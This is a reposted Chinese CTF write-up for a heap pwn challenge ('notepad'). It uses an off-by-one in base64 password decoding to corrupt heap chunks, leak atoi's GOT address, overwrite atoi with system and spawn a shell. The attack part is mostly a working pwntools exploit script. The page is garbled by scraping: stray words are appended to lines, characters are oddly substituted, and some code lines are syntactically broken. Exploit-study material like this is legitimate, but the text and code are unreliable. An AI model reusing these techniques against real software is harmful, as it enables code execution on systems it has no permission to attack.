2018科来杯PWN复现(二)



这道题官方 WP 说是CVE-2018-6789,原本想先复现一下漏洞再来看题,可是真实的漏洞比题目复杂,就又滚回来复现这道题目了Orzpython

题目地址:linux

https://pan.baidu.com/s/1_rwQCWIeII8zTQSdkTgPVwgit

提取码:jpzxgithub

参考:web

https://leeeddin.github.io/cve-2018-6789-off-by-one/数组

整 EXP 放后面吧否则影响阅读微信



程序本身会申请 0x30 大小的 chunk(malloc(0x28) 可是要对齐因此 0x30)用来直接存放 name、base64 解码后的 password 的指针以及 content 的指针,同时申请的这个会被放到 bss 段的 ptr 数组上面,后面把这个程序申请的 chunk 称为 note_header编辑器



说一下漏洞点:布局

前置知识:Base64编码C语言实现编码

在涉及 password 的时候会 malloc 相应的 size,经过对 base64 编码的了解,咱们已经知道了 base64 编码后应该是 4 的倍数,它将会被解码为 3 的倍数的长度,而后下面的代码中给了 3n + 1 的空间,是没有问题的



可是若是构造一个 4n+3 的 base64 编码去让他解码用到的就是 3n+2 就 off by one 了

例如:123 通过 base64 编码以后是:MTIz,在末尾加上字符:'MTI',去解码的时候会解码为 12312

原本是 4*1,加上两个以后就是 4*1+3 而后解码出来是 3*1+2



同时会在 *(_DWORD *)(note_header + 36) = 1 标注是否设置了 password



delete 的时候分别 free 掉 password 与 content 的指针,可是没有置为 null,仅仅是把 bss 段存放的 note_header 给删掉了



一开始这样去 malloc

passwd = "yichen".encode("base64") + "\x00"
addnote('1'*0x10,passwd,0x1c0,'1')
addnote('2'*0x10,passwd,0x20,'2')
addnote('3'*0x10,passwd,0x20,'3')

布局是这样的


delnote('1'*0x10,passwd)
#free(0x20)、free(0x1d0)、free(0x30)
addnote('1'*0x10,passwd,0x30,'aaaaaaa')
#malloc(0x30)、malloc(0x20)、malloc(0x40)
editnote('2'*0x10, passwd, 0x88-1"b"*0x10)
#free(0x30)、malloc(0x90)
editnote('3'*0x10, passwd, 0xf8-1"c"*0x10)
#free(0x30)、malloc(0x100)


而后删掉第 1 个(他是用 name 来选择的,咱们就用 name 的值来交流啦),而后 malloc 0x30 去分割那个比较大的 chunk,再编辑一下以前的 content,此时布局以下



本来 1 的 content 大小 0x1d0 被分为 0x40+0x90+0x100,空出来了 2 的 content(0x603270) 与 3 的 content(0x6032f0) 两个 0x30 大小的

注意到在最后多出来一个 0x20 大小的 free chunk 是 delete 的时候检查 password 留下的


这时候去作以下编辑

delnote("2"*0x10, passwd)
#检查password应该会直接用最后面的0x20的free chunk
#free(0x20)、free(0x90)、free(0x30)
evilpd = ("A"*0x88+'1').encode("base64").replace("\n","")[:-1]+"\x00"4
addnote("2"*0x10, evilpd, 0x20-1"padding")
#再去create的时候用上面free的0x30存放程序本身申请的那个note_header
#password会放到0x90那个地方,而content会放到前面剩下的一个0x30那里


password 的 off by one 会修改下面那个 0x100 大小的为 0x130


atoi_got = 0x602090
pwd2addr = 0x4019E6 #name exist
payload = ""
payload += "A"*0xf0
payload += p64(0x100)
payload += p64(0x31)
payload += '2'*0x10
payload += p64(pwd2addr)
payload += p64(atoi_got)
payload += p64(0x000000100001000)
editnote("3"*0x10,passwd,0x128-1,payload)
newpd = "name exist\x00".encode("base64")
shownote("2"*0x10,newpd)
atoiaddr = u64(io.recv(6).ljust(8,'\x00'))
libcbase = atoiaddr - libc.symbols['atoi']
sysaddr = libcbase + libc.symbols['system']

而后 edit 的时候就能够直接覆盖掉下面那块 0x30大小的第二个的 note_header,有个问题是须要 password,能够把 password 指针改成存在的一个字符串的地址,好比:0x4019E6,再去 show 的时候能够拿到 atoi 的 got 地址,算出 system 的地址




而后 edit2 把 atoi 的地址改成 system 的地址,而后发一个 '/bin/sh' 就能够啦

payload = p64(sysaddr)
editnote("2"*0x10,newpd,0x10,payload)
p.sendlineafter('choice> ','/bin/sh\x00')
p.interactive()

参考的师傅的 exp 没有发送 '/bin/sh' 也能够!?不知道什么缘由

完整 EXP:

#!/usr/bin/env python
# -*- coding=utf8 -*-
from pwn import *
p = process('./notepad')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context.log_level = 'info'

def addnote(name,password,size,content):
 p.sendlineafter('choice> ','1')
 p.sendafter('name> ',name)
 p.sendlineafter('no)> ','1')
 p.sendlineafter('word> ',password)
 p.sendlineafter('size> ',str(size))
 p.sendlineafter('content> ',content)

def shownote(name,passwd):
 p.sendlineafter('choice> ','2')
 p.sendafter('name> ',name)
 p.sendlineafter('word> ',passwd)
 
def editnote(name,passwd,size,content):
 p.sendlineafter('choice> ','3')
 p.sendafter('name> ',name)
 p.sendlineafter('word> ',passwd)
 p.sendlineafter('no)> ','0')
 p.sendlineafter('size> ',str(size))
 p.sendlineafter('content> ',content)
 
def delnote(name,passwd):
 p.sendlineafter('choice> ','4')
 p.sendafter('name> ',name)
 p.sendlineafter('password> ',passwd)

passwd = "yichen".encode("base64") + "\x00"
addnote('1'*0x10,passwd,0x1c0,'1')
addnote('2'*0x10,passwd,0x20,'2')
addnote('3'*0x10,passwd,0x20,'3')
delnote('1'*0x10,passwd)
addnote('1'*0x10,passwd,0x30,'aaaaaaa')
editnote('2'*0x10, passwd, 0x88-1"b"*0x10)
editnote('3'*0x10, passwd, 0xf8-1"c"*0x10)

delnote("2"*0x10, passwd)
evilpd = ("A"*0x88+'1').encode("base64").replace("\n","")[:-1]+"\x00"
addnote("2"*0x10, evilpd, 0x20-1"padding")

atoi_got = 0x602090
pwd2addr = 0x4019E6 #name exist\x00
payload = ""
payload += "A"*0xf0
payload += p64(0x100)
payload += p64(0x31)
payload += '2'*0x10
payload += p64(pwd2addr)
payload += p64(atoi_got)
payload += p64(0x000000100001000)
editnote("3"*0x10,passwd,0x128-1,payload)

newpd = "name exist\x00".encode("base64")
shownote("2"*0x10,newpd)
atoiaddr = u64(p.recv(6).ljust(8,'\x00'))
libcbase = atoiaddr - libc.symbols['atoi']
sysaddr = libcbase + libc.symbols['system']

payload = p64(sysaddr)
editnote("2"*0x10,newpd,0x10,payload)
p.sendlineafter('choice> ','/bin/sh\x00')
p.interactive()

本文分享自微信公众号 - 陈冠男的游戏人生(CGN-115)。
若有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一块儿分享。

相关文章
相关标签/搜索